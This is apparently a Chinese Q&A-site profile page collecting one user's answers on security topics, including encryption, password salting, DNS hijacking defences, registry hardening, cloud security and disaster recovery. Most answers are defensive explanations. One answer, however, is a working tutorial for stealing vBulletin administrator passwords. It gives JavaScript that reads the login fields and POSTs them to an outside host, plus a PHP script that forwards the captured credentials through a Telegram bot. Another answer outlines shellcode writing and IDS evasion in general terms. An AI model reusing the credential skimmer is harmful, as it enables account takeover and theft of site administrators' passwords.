Andrew 的所有回复(122)

评论于 7个月前,获得 1 个赞

隐私保护技术包含:

密码技术:

密码技术是解决个人隐私保护的基础技术,可确保个人信息保密性、完整性和不可否认性。通过密码算法和密钥管理,可实现认证、保密、授权等相关功能,为个人隐私保护多元架构建立真实、关联、合法环境奠定基础。“三三原则”是个人隐私保护使用密码技术的原则,具体内容请查阅以往文章。

追踪技术:

个人信息泄露方式有很多种,完全防止的难度很大,但亡羊补牢也是必须的。追踪技术就是对信息泄密的途径进行掌握,一方面可以弥补体系漏洞,一方面也可以追回部分损失。鉴于个人信息存在形式不同,所采用的追踪技术也不尽相同,比如电脑屏显数据可以采用防拍追踪技术,对于传输中的数据可以采用内容审核与追踪技术。追踪技术的设计和选择要视形式而定。

脱敏技术:

获取个人信息的意义在于分析和关联分析,关联越多,信息价值越大,而保护个人信息的重要工作就是要保护这些关联性,使非法信息获取者没有办法得到太多的有用价值。脱敏技术就是用来降低信息可见性和关联性的技术,已经在众多应用场景中广泛应用。

取证鉴定技术:

取证和鉴定往往在事后,但是取证和鉴定技术是可以应用在全局,也就是通过对取证和鉴定技术的理解,在个人隐私保护设计过程中本着确保个人信息最终可成为电子证据的设计目标,将取证和鉴定技术反向应用。

可信时空技术:

时间和空间信息对于一个客观物质的重要性不言而喻,在信息瞬息万变的互联网应用中,信息的鲜度和客观存在性同样需要进行时空标记,并且必须保障标记的可信,而可信时空技术就是一种可信标记技术,能将信息活生生的表达出来,并保障可信。

评论于 1周前,获得 0 个赞
  1. 加密机制

    加密技术是将通信明文转换成密文,信息以加密密文的方式在信道中传输,最终通过解密密钥将密文解密为明文的过程。加密机制是一种基本的安全机制,可保障信息在信道中加密传输。加密算法需要进行复杂的运算,由于移动通信网络中计算环境和通信环境有限,使得无线通信网络在选用加密技术保护网络保障网络的安全性时必须选择能够适应无线通信网络特点的密码算法。

  2. 认证机制

    完整性检测技术用于提供消息认证的安全机制,为了抵抗恶意攻击,完整性检测技术需要加入秘密消息,攻击者不知道秘密消息,所以不能生成有效的消息完整性码。消息认证码是典型的完整性检测技术,将消息通过一个带密钥的杂凑函数产生一个消息完整性码,并就这个消息完整性码附在消息之后一起传给接收方,接收方在收到消息后可以重新计算消息完整性码,如果不相等,接收方就知道消息在传输过程中被篡改了。另外一种完整性检测的方式是在杂凑函数生成的杂凑值的基础上,对杂凑值进行加密,将信息和加密后的消息完整性码一同发给接收方,接收方对消息完整性码进行解密,与重新计算出的杂凑值进行比较,如果相同,则消息未被篡改,反之则被篡改。

    数字签名技术用于提供服务不可否认性的安全机制,使用较多的数字签名技术是基于公钥密码技术。用户利用密钥对一个消息或该消息的杂凑值进行签名,然后将消息和签名一起传给验证方,验证方利用签名者公开的密钥就可以鉴别签名的真伪。

  3. 访问控制策略

    在移动通信网络中,访问控制的目的是为防止对网络资源进行非授权的访问,访问控制支持数据的保密性及完整性。访问控制能够阻止非法用户进入系统、允许合法用户进入系统、使合法用户按照各自的权限进行各项活动。访问控制策略包括主动访问控制和强制访问控制。主动访问控制由资源拥有者在辨别各用户的基础上实现接入控制,每个用户的接入权限由资源的拥有者来设定;强制访问控制由系统管理员统一管理系统的资源,并集中分配接入权限。

评论于 3个月前,获得 0 个赞

用户信息“脱库”后,黑客利用字典攻击:维护一个常用密码的字典表,将字典中每个密码用hash算法计算hash值,如果用户“脱库”后的密文和hash值相等,基本就可以认为密文对对应的密码就是字典中的密码。

针对字典攻击,我们可以引入一个盐(salt),与用户的密码组合到一起,增加密码难度,对组合后的字符串做hash算法算法加密,将其存储到数据库中,增大破解难度。不过,安全与攻击是一种博弈关系,不存在绝对的安全,所有安全措施都只是增加攻击成本而已。

评论于 1周前,获得 0 个赞

Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode,因此掌握Shellcode编写技术就显得尤为重要。

Shellcode编写考虑因素

Shellode一般作为数据发送给服务端造成溢出,不同数据对数据要求不同,因此,Shellcode也不一定相同。但Shellcode在编写过程中,有些问题是一致的:

  1. Shellcode的编写语言。用什么语言编写最适合Shellcode呢?这个问题没有定论。一般采用的是C语言,速度较快,但是ASM更便于控制Shellcode的生成。

  2. Shellcode本身代码的重定位。Shellcode的流程控制,即如何通过溢出使控制权落在Shelcode手中。

  3. Shellcode中使用的API地址定位。

  4. Shellcode编码问题。

  5. 多态技术躲避IDS检测。

评论于 6个月前,获得 0 个赞

先修改配置文件,MySQL/MariaDB默认并没有采用utf-8编码,所以我们要修改配置文件,以让其使用utf-8。在/etc/my.cnf就是配置文件使用VIM打开后在他下面加入一些两行代码使其变成如下:

[mysqld]
character_set_server=utf8 
init_connect='SET NAMES utf8'

然后重启服务,另一个就是修改数据库字符集,在修改配置文件之后新建的数据库默认就是使用utf-8了,但是之前的还不是所以要修改一下。登录到数据库,在命令行界面修改数据库的字符集。使用下面命令:

ALTER DATABASE `databases_name` COLLATE 'utf8_bin';

同样修改完毕后重启,这样就能解决这个问题了。

评论于 2个月前,获得 0 个赞

基于异常检测原理的入侵检测方法有以下几种:

(1)统计异常检测方法;

(2)特征选择异常检测方法;

(3)基于贝叶斯推理异常检测方法;

(4)基于贝叶斯网络异常检测方法;

(5)基于模式预测异常检测方法。

其中,比较成熟的方法是统计异常检测方法和特征选择异常检测方法。

异常检测技术又称为基于行为的入侵检测技术,用来识别主机或网络中的异常行为。它假设攻击与正常的(合法的)活动有明显的差异。异常检测首先收集一段时间操作活动的历史数据,再建立代表主机、用户或网络连接的正常行为描述,然后收集事件数据并使用一些不同的方法来决定所检测到的事件活动是否偏离了正常行为模式,从而判断是否发生了入侵。异常检测模型的结构如图所示。

什么是异常检测,基于异常检测原理的入侵检测方法有哪些?

评论于 3个月前,获得 0 个赞

DNS劫持原理

DNS(域名系统)的作用是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS的IP。

域名被劫持的几种方式

要通过托管提供商或域名注册商访问域名设置,需要输入两种东西:购买域名时设置的用户名和密码。用户名通常是买方的电子邮件地址。没有什么比这更容易找到了,黑客要做的就是在whois目录中查找网站。

然后,他们需要为域名账户设置的密码。黑客可以通过多种方式获取密码,或者至少收集个人信息,以帮助他们闯入域名账户。以下是两种常见策略:

身份盗窃:如果互联网和社交媒体上存在有关自己身份的许多信息,黑客可以使用它们来跨越域名账户安全设置。

例如,如果黑客可以进入电子邮件账户,则只需打开域名账户登录页面,点击“忘记密码”链接,然后回复确认邮件来冒充。

网络钓鱼邮件:黑客可能会发送网络钓鱼邮件,以诱骗别人泄露域名账户凭据。该电子邮件看起来像是注册服务商或托管服务提供商的重要来信,他们会要求提供与域名账户相关的信息。黑客之所以这样做,是因为有一定比例的人信以为真并放弃重要信息。

如何防止DNS劫持?

1、互联网公司准备两个以上的域名,一旦黑客进行DNS攻击,用户还可以访问另一个域名。

2、手动修改DNS:

在地址栏中输入:http://192.168.1.1 (如果页面不能显示可尝试输入:http://192.168.0.1)。

填写您路由器的用户名和密码,点击“确定”。

在“DHCP服务器—DHCP”服务中,填写主DNS服务器为更可靠的114.114.114.114地址,备用DNS服务器为8.8.8.8,点击保存即可。

3、修改路由器密码:

在地址栏中输入:http://192.168.1.1 (如果页面不能显示可尝试输入:http://192.168.0.1)

填写您路由器的用户名和密码,路由器初始用户名为admin,密码也是admin,如果您修改过,则填写修改后的用户名和密码,点击“确定”

填写正确后,会进入路由器密码修改页面,在系统工具——修改登录口令页面即可完成修改(原用户名和口令和2中填写的一致)

评论于 6天前,获得 0 个赞

有关注册表攻防涉及的内容较多,而且大都是一些具体操作:

  1. 禁用注册表编辑器:在Windows系统安装结束后,用户可以使用注册表编辑工具regedit.exe对注册表进行修改,存在较大的安全隐患。对于提供信息服务的重要系统,可以通过禁止用户使用注册表编辑工具来提高系统的安全性。

  2. 限制对注册表的远程访问:由于注册表是Windows系统的核心,而且默认情况下所有安装Windows操作系统的计算机注册表在网络上都是可以被访问的,攻击者完全可以利用这个漏洞来对目标主机进行注册表攻击,修改文件内容,插入恶意代码。为了保护Windows操作系统的安全,可以禁止对注册表的远程访问。具体方法是:在本地“服务”列表中找到“Remote Registry”服务,将其“启动类型”设置为“禁用”即可。

  3. 禁用注册表的启动项:一些恶意代码或攻击程序通过注册表的启动项(RUN值)来加载运行。出于安全考虑,可以在注册表编辑器中依次展开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun,将子键“Run”的权限设置为“读取”,取消对“完全控制”权限的选择。

评论于 4个月前,获得 0 个赞

云安全

云安全正在发展,它构成了网络安全和信息安全的一部分。从根本上说,云安全指的是一系列广泛的技术、控制和策略。它们用于保护数据、应用程序和云基础设施的安全。从最终用户和云服务提供商(CSP)的角度来看,云安全涵盖了广泛的安全实践。虽然最终用户主要关注CSP的安全策略,但他们同样关注数据存储和云上数据的访问。

云提供商的安全包括云基础设施和访问控制机制的物理安全。但是,它还扩展到安全策略的执行和维护。云安全提供商承担着更大的责任,因为这是组织害怕云的地方。

云安全联盟(CSA)是一个非营利性组织,向组织和安全提供商提供有关在操作环境中实施安全的培训。该平台是由行业专家汇集云计算指南和框架开发的。

网络安全

与云安全相比,网络安全具有更广阔的视角。它包含由网络安全团队实施的策略、技术、控制和程序。此外,网络安全的目标是跟踪和控制对网络及其组件的未经授权的访问。从根本上说,良好的网络安全可以阻止网络攻击者用恶意软件、病毒等入侵网络。

最初,网络安全遵循允许授权用户在自定义权限下访问的注册机制。同时,网络防火墙根据定义的策略实施可访问的服务。即使网络防火墙并不总是识别和防御导致数据丢失的恶意软件或有害内容,也会安装反恶意软件来实现这一目的。反恶意软件或反病毒保护网络免受恶意行为者进入网络的影响。

如您所见,认证的网络防御者在为CSP提供网络防御方面负有巨大的责任。EC-Council的认证网络防御者(CND)培训网络管理员如何保护、检测和应对网络上的威胁。由于网络管理员已经具备网络知识,因此CND培训课程将向应聘者提供网络防御基础知识、网络安全控制应用、协议、外围设备、安全IDS、VPN和防火墙配置、复杂的网络流量签名、分析和漏洞扫描。

云安全和网络安全有什么区别?

说到云安全的边界问题,因为云安全和网络安全与数据,数据中心,网络和其他领域有关,并且安全威胁也来自多种方式,例如特洛伊木马,病毒和密码。因此,从技术角度来看,云安全性和网络安全性之间没有本质区别。

但是,从应用的角度来看,传统的安全防护使用通用软件来实现安全防护?以及病毒的检测和查杀,但进入了云计算时代,尤其是在互联网时代,本质已经让汽车,飞机,烤箱设备之类的设备不能仅依靠设备上的安全软件来提供保护。当今的远程攻击已经具有APT攻击的属性,即使设置了边界并安装了保护软件,也不能保证它绝对安全。因此,云安全保护的范围实际上比传统的网络安全要大得多。换句话说,云安全已无限扩大了安全范围。

结果,似乎安全厂商仍在使用诸如以前的解决方案和防火墙之类的技术来消除威胁。但是,由于覆盖范围和广度,云安全性显然带来了许多新问题。

评论于 3天前,获得 0 个赞

数据库加密是指对数据库存储或传输的数据进行加密处理,以密文形式存储或传输,防止数据泄密,保护敏感数据的安全性。按照加密组件与数据库管理系统的关系,数据库存储加密可以分成两种加密方式:库内加密和库外加密。

库内加密是指在 DBMS 内部实现支持加密的模块,如图 1 所示。

数据库加密方式有什么

图1 数据库库内加密示意图

库外加密指在 DBMS 范围之外,由专门的加密部件完成加密/解密操作,如图 2 所示。数据库存储加密的常用技术方法有基千文件的数据库加密技术、基于记录的数据库加密技术、基千字段的数据库加密技术。其中,基千文件的数据库加密技术将数据库文件作为整体,对整个数据库文件进行加密,形成密文来保证数据的机密性。基于记录的数据库加密技术将数据库的每一个记录加密成密文并存放千数据库文件中。基千字段的数据库加密技术加密数据库的字段,以不同记录的不同字段为基本加密单元进行加密。

数据库加密方式有什么

图2 数据库库外加密示意图

评论于 6个月前,获得 0 个赞

通过数据库中的加密密码来更改管理加密密码以访问管理面板,但您可能很快就会离开服务器。

但是有一个更好的解决方案,可以通过网络钓鱼攻击或使用JavaScript窃取密码来获取管理员纯文本密码,我将在本主题中进行介绍。

我们可以使用PHP并在发布请求后获取密码,但是vBulletin会在客户端使用JavaScript使用MD5加密密码,因此我们将尝试在密码加密之前获取密码。

我将使用的脚本是:

function mal()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://example/admindata.php", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send("Data="+document.getElementById("vb_login_username").value + " " + document.getElementById("vb_login_password").value);
}

给定的脚本获取密码并将其发送到PHP脚本,然后将其写入文件或使用电报或电子邮件将其发送给您(使用电报API的示例):

<?php

if ($_SERVER['REQUEST_METHOD'] == "POST" && isset($_POST['Data']))
{
$token = "YOUR_TOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage? 
chat_id=YOUR_CHAT_ID&text=" . urlencode($_POST['Data'])."" );
}
else
    header("Location: https://google.com");
?>

因此,现在您可以将PHP脚本上传到同一台服务器或同一台服务器上,或者可以直接从JavaScript发送密码。

评论于 6天前,获得 0 个赞

两者都可以在域控制器上利用系统管理员身份登录后设置域安全策略,域安全策略管理属于该域内的所有计算机但是域控制器是管理单位内所有的域控制器而不是计算机,域安全策略是优先于计算机策略但低于域控制器安全策略的,当域安全策略改变时要应用到计算机才有效而域控制器安全策略不受影响。

  1. 域安全策略:
  • 可以在域控制器上利用系统管理员身份登录后设置域安全策略,具体设置方式与本地安全策略的设置相同。

  • 隶属于域的任何一台计算机,都会受到域安全策略的影响。

  • 隶属于域的计算机,如果其本地安全策略设置与域安全策略设置发生冲突,则以域安全策略设置优先,本地设置自动失效。

  • 当域安全策略的设置发生了变化,这些策略必须应用到本地计算机后才能对本地计算机有效。

  1. 域控制器安全策略:
  • 可以在域控制器上利用系统管理员身份登录后设置域控制器安全策略,其设置方法与域安全策略和本地安全策略相同。

  • 任何一台位于组织单位域控制器内的域控制器,都会受到域控制器安全策略的影响。

  • 域控制器安全策略的设置必须要应用到域控制器后,这些设置对域控制器才起作用。域控制器安全策略与域安全策略的设置发生冲突时,对于域控制器容器内的计算机来说,默认以域控制器安全策略的设置优先,域安全策略自动失效。

  • 域安全策略中的账户策略设置对域内所有的用户都有效,即使用户账户位于组织单位域控制器内也有效,也就是说,域控制器安全策略中的账户策略对域控制器并不起作用。

评论于 1周前,获得 0 个赞

系统恢复技术的方法主要有下面几种。

  1. 系统紧急启动

当计算机系统因口令遗忘、系统文件丢失等导致系统无法正常使用的时候,利用系统紧急启动盘可以恢复受损的系统,重新获取受损的系统访问权限。系统紧急启动盘主要的作用是实现计算设备的操作系统引导恢复,主要类型有光盘、U盘。系统紧急启动盘保存操作系统最小化启动相关文件,能够独立完成对相关设备的启动。

  1. 恶意代码清除

系统遭受恶意代码攻击后无法正常使用,通过使用安全专用工具,对受害系统的恶意代码进行清除。

  1. 系统漏洞修补

针对受害系统,通过安全工具检查相应的安全漏洞,然后安装补丁软件。

  1. 文件删除恢复

操作系统删除文件时,只是在该文件的文件目录项上做一个删除标记,把 FAT 表中所占用的簇标记为空簇,而DATA 区域中的簇仍旧保存着原文件的内容。因此,计算机普通文件删除只是逻辑做标记,而不是物理上清除,此时通过安全恢复工具,可以把已删除的文件找回来。

  1. 系统备份容灾

常见的备份容灾技术主要有磁盘阵列、双机热备系统、容灾中心等。当运行系统受到攻击瘫痪后,启用备份容灾系统,以保持业务连续运行和数据安全。例如,用 Ghost 软件备份计算机操作系统环境,一旦系统受到破坏,就用备份系统重新恢复。针对网络信息系统的容灾恢复问题,国家制定和颁布了《信息安全技术 信息系统灾难恢复规范 (GB/T 20988 2007) 》,该规范定义了六个灾难恢复等级和技术要求,各级规范要求如下:

  • 第1级-基本支持。本级要求至少每周做一次完全数据备份,并且备份介质场外存放;同时还需要有符合介质存放的场地;企业要制定介质存取、验证和转储的管理制度,并按介质特性对备份数据进行定期的有效性验证;企业需要制订经过完整测试和演练的灾难恢复预案。

  • 第2级-备用场地支持。第2级在第1级的基础上,还要求配备灾难发生后能在预定时间内调配使用的数据处理设备和通信线路以及相应的网络设备;并且对于第1级中存放介质的场地,需要其能满足信息系统和关键业务功能恢复运作的要求;对于企业的运维能力,也增加了相应的要求,即要制定备用场地管理制度,同时要与相关厂商、运营商有符合灾难恢复时间要求的紧急供货协议、备用通信线路协议。

  • 第3级-电子传输和部分设备支持。第3级不同于第2级的调配数据处理设备和具备网络系统紧急供货协议,其要求配置部分数据处理设备和部分通信线路及相应的网络设备;同时要求每天多次利用通信网络将关键数据定时批量传送至备用场地,并在灾难备份中心配置专职的运行管理人员;对千运行维护来说,要求制定电子传输数据备份系统运行管理制度。

  • 第4级-电子传输及完整设备支待。第4级相对于第3级中的配备部分数据处理设备和网络设备而 ,须配置灾难恢复所需的全部数据处理设备和通信线路及网络设备,并处于就绪状态;备用场地也提出了支持 7X24 小时运作的更高的要求,同时对技术支持和运维管理的要求也有相应的提高。

  • 第5级-实时数据传输及完整设备支持。第5级相对于第4级的数据电子传输而言,要求实现远程数据复制技术,并利用通信网络将关键数据实时复制到备用场地;同时要求备用网络具备自动或集中切换能力。

  • 第6级-数据零丢失和远程集群支持。第6级相对于第5级的实时数据复制而言,要求数据远程实时备份,实现数据零丢失;同时要求应用软件是集群的,可以实现实时无缝切换,并具备远程集群系统的实时监控和自动切换能力;对千备用网络的要求也有所加强,要求用户可通过网络同时接入主、备中心。

评论于 2周前,获得 0 个赞

计算机网络安全的主要措施有预防、检测和恢复三类。

  1. 预防。是一种行之有效的、积极主动的安全措施,它可以排除各种预先能想到的威胁。例如,访问控制、安全标记、防火墙等都属预防措施。

  2. 检测。也是一种积极主动的安全措施,它可预防那些较为隐蔽的威胁。例如,基于主机的入侵检测、病毒检测器、系统脆弱性扫描等都属检测措施。检测分边境检测、境内检测和事故检测三个阶段。边境检测阶段主要是针对进出网络边界的各种行为进行安全检查和验证,境内检测阶段主要针对在网络区域内的各种操作行为进行监视、限制和记录,事故检测主要是用于安全管理、分析等的检测。

  3. 恢复。是一种消极的安全措施,它是在受到威胁后采取的补救措施。例如,重新安装系统软件、重发数据、打补丁、清除病毒等都属恢复措施。

一个安全策略可采用不同类型的安全措施,或联合使用,或单独使用,至于选择何种安全措施取决于该策略的目的和所采用的安全机制。网络环境下可以采用的安全机制包括:加密机制、密钥管理、数字签名、访问控制、数据完整性、认证交换、通信业务填充、路由选择控制、公证机制、物理安全与人员可靠,以及可信任的硬件与软件等内容。

评论于 2个月前,获得 0 个赞

①为手机设置访问密码是保护手机安全的第道防线, 以防智能手机丢失时,犯罪分子获得通讯录、文件等重要信息并加以利用。

②不要轻易打开陌生人通过手机发送的链接和文件。

③为手机设置锁屏密码,并将手机随身携带。

④在QQ、微信等应用程序中关闭地理定位功能,并仅在需要时开启蓝牙。

⑥安装安全防护软件,并经常对手机系统进行扫描。

⑦到权威网站下载手机应用软件,并在安装时谨慎选择相关权限。

⑧不要试图破解自己的手机,以保证应用程序的安全性。

1879 声望
文章
560
粉丝
9
喜欢
5